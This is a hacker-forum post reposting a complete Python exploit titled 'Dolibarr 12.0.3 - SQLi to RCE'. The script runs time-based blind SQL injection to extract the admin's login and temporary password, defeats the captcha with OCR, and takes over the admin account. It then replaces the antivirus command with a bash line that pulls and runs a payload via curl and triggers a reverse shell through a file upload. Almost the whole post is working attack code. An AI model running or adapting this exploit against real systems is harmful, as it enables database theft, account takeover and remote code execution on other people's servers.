Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Dolibarr 12.0.3 - SQLi to RCE

 Share


Recommended Posts

# Exploit Title: Dolibarr 12.0.3 - SQLi to RCE
# Date: 2/12/2020
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/
# Version: 12.0.3

import argparse
import binascii
import random
import re
from io import BytesIO
from urllib.parse import quote_plus as qp

import bcrypt
import pytesseract
import requests
from bs4 import BeautifulSoup
from PIL import Image

DELTA = None
DEBUG = 1
SESSION = requests.session()
TRESHOLD = 0.80
DELAY = 1
LIKE = "%_subscription"
COLUMNS = ["login", "pass_temp"]


def usage():
    banner = """NAME: Dolibarr SQLi to RCE (authenticate)
SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PAS=
SWORD>
EXAMPLE:
    python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12=
.0.3/htdocs/" -u test -p test
AUTHOR: coiffeur
    """
    print(banner)
    exit(-1)


def hex(text):
    return "0x" + binascii.hexlify(text.encode()).decode()


def hash(password):
    salt = bcrypt.gensalt()
    hashed = bcrypt.hashpw(password.encode(), salt)
    return hashed.decode()


def authenticate(url, username, password):
    datas = {
        "actionlogin": "login",
        "loginfunction": "loginfunction",
        "username": username,
        "password": password
    }
    r = SESSION.post(f"{url}index.php", data=datas,
                     allow_redirects=False, verify=False)
    if r.status_code != 302:
        if DEBUG:
            print(f"[x] Authentication failed!")
        return 0
    if DEBUG:
        print(f"    [*] Authenticated as: {username}")
    return 1


def get_antispam_code(base_url):
    code = ""
    while len(code) != 5:
        r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False)
        temp_image = f"/tmp/{random.randint(0000,9999)}"
        with open(temp_image, "wb") as f:
            f.write(r.content)
        with open(temp_image, "rb") as f:
            code = pytesseract.image_to_string(
                Image.open(BytesIO(f.read()))).split("\n")[0]
        for char in code:
            if char not in "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679":
                code = ""
                break
    return code


def reset_password(url, login):
    for _ in range(5):
        code = get_antispam_code(url)
        headers = {
            "Referer": f"{url}user/passwordforgotten.php"
        }
        datas = {
            "action": "buildnewpassword",
            "username": login,
            "code": code
        }
        r = SESSION.post(url=f"{url}user/passwordforgotten.php",
                         data=datas, headers=headers, verify=False)
        if r.status_code == 200:
            for response in [f"Request to change password for {login} sent =
to", f"Demande de changement de mot de passe pour {login} envoy=C3=A9e"]:
                if r.text.find(response):
                    if DEBUG:
                        print(f"    [*] Password reset using code: {code}")
                    return 1
    return 0


def change_password(url, login, pass_temp):
    r = requests.get(url=f"{url}user/passwordforgotten.php?action=val=
idatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}",
                     allow_redirects=False, verify=False)
    if r.status_code == 302:
        if DEBUG:
            print(f"    [*] Password changed: {pass_temp}")
        return 1
    return 0


def change_binary(url, command, parameters):
    headers = {
        "Referer": f"{url}admin/security_file.php"
    }
    datas = {
        "action": "updateform",
        "MAIN_UPLOAD_DOC": "2048",
        "MAIN_UMASK": "0664",
        "MAIN_ANTIVIRUS_COMMAND": command,
        "MAIN_ANTIVIRUS_PARAM": parameters
    }
    r = SESSION.post(url=f"{url}admin/security_file.php",
                     data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        for response in ["Record modified successfully", "Enregistrement mo=
difi=C3=A9 avec succ=C3=A8s"]:
            if response in r.text:
                if DEBUG:
                    print(f"    [*] Binary's path changed")
                return 1
    return 0


def trigger_exploit(url):
    headers = {
        "Referer": f"{url}admin/security_file.php"
    }
    files = {
        "userfile[]": open("junk.txt", "rb"),
    }
    datas = {
        "sendit": "Upload"
    }
    if DEBUG:
        print(f"    [*] Triggering reverse shell")
    r = SESSION.post(url=f"{url}admin/security_file.php",
                     files=files, data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        for response in ["File(s) uploaded successfully", "The antivirus pr=
ogram was not able to validate the file (file might be infected by a virus)=
", "Fichier(s) t=C3=A9l=C3=A9vers=C3=A9s(s) avec succ=C3=A8s", "L'antivirus=
 n'a pas pu valider ce fichier (il est probablement infect=C3=A9 par un vir=
us) !"]:
            if response in r.text:
                if DEBUG:
                    print(f"    [*] Exploit done")
                return 1
    return 0


def get_version(url):
    r = SESSION.get(f"{url}index.php", verify=False)
    x = re.findall(
        r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", r.text)
    if x:
        version = x[0]
        if "12.0.3" in version:
            if DEBUG:
                print(f"    [*] {version} (exploit should work)")
            return 1
    if DEBUG:
        print(f"[*] Version may not be vulnerable")
    return 0


def get_privileges(url):
    r = SESSION.get(f"{url}index.php", verify=False)
    x = re.findall(r"id=\d", r.text)
    if x:
        id = x[0]
        if DEBUG:
            print(f"    [*] id found: {id}")
        r = SESSION.get(f"{url}user/perms.php?{id}", verify=False)
        soup = BeautifulSoup(r.text, 'html.parser')
        for img in soup.find_all("img"):
            if img.get("title") in ["Actif", "Active"]:
                for td in img.parent.parent.find_all("td"):
                    privileges = [
                        "Consulter les commandes clients", "Read customers =
orders"]
                    for privilege in privileges:
                        if privilege in td:
                            if DEBUG:
                                print(
                                    f"    [*] Check privileges: {privilege}=
")
                            return 1
    if DEBUG:
        print(f"[*] At the sight of the privileges, the exploit may fail")
    return 0


def check(url, payload):
    headers = {
        "Referer": f"{url}commande/stats/index.php?leftmenu=orders"
    }
    datas = {"object_status": payload}
    r = SESSION.post(url=f"{url}commande/stats/index.php",
                     data=datas, headers=headers, verify=False)
    return r.elapsed.total_seconds()


def evaluate_delay(url):
    global DELTA
    deltas = []
    payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"
    for _ in range(4):
        deltas.append(check(url, payload))
    DELTA = sum(deltas)/len(deltas)
    if DEBUG:
        print(f"    [+] Delta: {DELTA}")


def get_tbl_name_len(url):
    i = 0
    while 1:
        payload = f"IF((SELECT LENGTH(table_name) FROM information_schema=
.tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))"
        if check(url, payload) >= DELTA*TRESHOLD:
            return i
        if i > 100:
            print(f"[x] Exploit failed")
            exit(-1)
        i += 1


def get_tbl_name(url, length):
    tbl_name = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM i=
nformation_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP=
({DELAY}), SLEEP(0))"
            if check(url, payload) >= DELTA*TRESHOLD:
                max = mid
            else:
                min = mid + 1
        tbl_name += chr(min)
    return tbl_name


def get_elt_len(url, tbl_name, column_name):
    i = 0
    while 1:
        payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMI=
T 1)>{i}, SLEEP(0), SLEEP({DELAY}))"
        if check(url, payload) >= DELTA*TRESHOLD:
            return i
        if i > 100:
            print(f"[x] Exploit failed")
            exit(-1)
        i += 1


def get_elt(url, tbl_name, column_name, length):
    elt = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FRO=
M {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))"
            if check(url, payload) >= DELTA*TRESHOLD:
                max = mid
            else:
                min = mid + 1
        elt += chr(min)
    return elt


def get_row(url, tbl_name):
    print(f"    [*] Dump admin's infos from {tbl_name}")
    infos = {}
    for column_name in COLUMNS:
        elt_length = get_elt_len(url, tbl_name, column_name)
        infos[column_name] = get_elt(url, tbl_name, column_name, elt_leng=
th)
    if DEBUG:
        print(f"    [+] Infos: {infos}")
    return infos


def main(url, username, password):
    # Check if exploit is possible
    print(f"[*] Requirements:")
    if not authenticate(url, username, password):
        print(f"[x] Exploit failed!")
        exit(-1)
    get_version(url)
    get_privileges(url)

    print(f"\n[*] Starting exploit:")
    # Evaluate delay
    evaluate_delay(url)
    print(f"    [*] Extract prefix (using table: {LIKE})")
    tbl_name_len = get_tbl_name_len(url)
    tbl_name = get_tbl_name(url, tbl_name_len)
    prefix = f"{tbl_name.split('_')[0]}_"
    if DEBUG:
        print(f"    [+] Prefix: {prefix}")

    # Dump admin's infos
    user_table_name = f"{prefix}user"
    infos = get_row(url, user_table_name)
    if not infos["login"]:
        print(f"[x] Exploit failed!")
        exit(-1)

    # Reset admin's passworrd
    if DEBUG:
        print(f"    [*] Reseting {infos['login']}'s password")
    if not reset_password(url, infos["login"]):
        print(f"[x] Exploit failed!")
        exit(-1)
    infos = get_row(url, user_table_name)

    # Remove cookies to logout
    # Change admin's password
    # Login as admin
    SESSION.cookies.clear()
    if not change_password(url, infos['login'], infos['pass_temp']):
        print(f"[x] Exploit failed!")
        exit(-1)
    authenticate(url, infos['login'], infos['pass_temp'])

    # Change antivirus's binary path
    # Trigger reverse shell
    change_binary(url, "bash", '-c "$(curl http://127.0.0.1:8000/poc.txt)"'=
)
    trigger_exploit(url)
    return 0


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", help="Base URL of Dolibarr")
    parser.add_argument("-u", help="Username")
    parser.add_argument("-p", help="Password")
    args = parser.parse_args()

    if not args.t or not args.u or not args.p:
        usage()

    main(args.t, args.u, args.p)
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...